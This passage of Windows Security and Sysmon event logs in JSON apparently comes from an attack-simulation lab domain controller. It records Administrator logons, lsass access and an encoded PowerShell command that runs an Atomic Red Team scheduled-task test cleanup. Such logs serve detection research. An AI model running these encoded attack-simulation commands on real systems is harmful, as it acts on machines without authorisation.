{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220642,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8A6A2\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{8ED4953C-AE4F-1E8E-0B29-CF5B34CE4BA3}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x8a6a2","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{8ED4953C-AE4F-1E8E-0B29-CF5B34CE4BA3}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220643,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x8A6A2\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x8a6a2","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5945,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.198\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.198","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5946,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.198\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.198","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5947,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.377\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nProcessId: 1092\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nParentProcessId: 4660\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.377","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","ParentProcessId":"4660","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5948,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-00104F900800}\r\nSourceProcessId: 4660\r\nSourceThreadId: 3980\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-00104F900800}","SourceProcessId":"4660","SourceThreadId":"3980","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","TargetProcessId":"1092","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFF44548890)","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5949,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","TargetProcessId":"1092","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5950,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 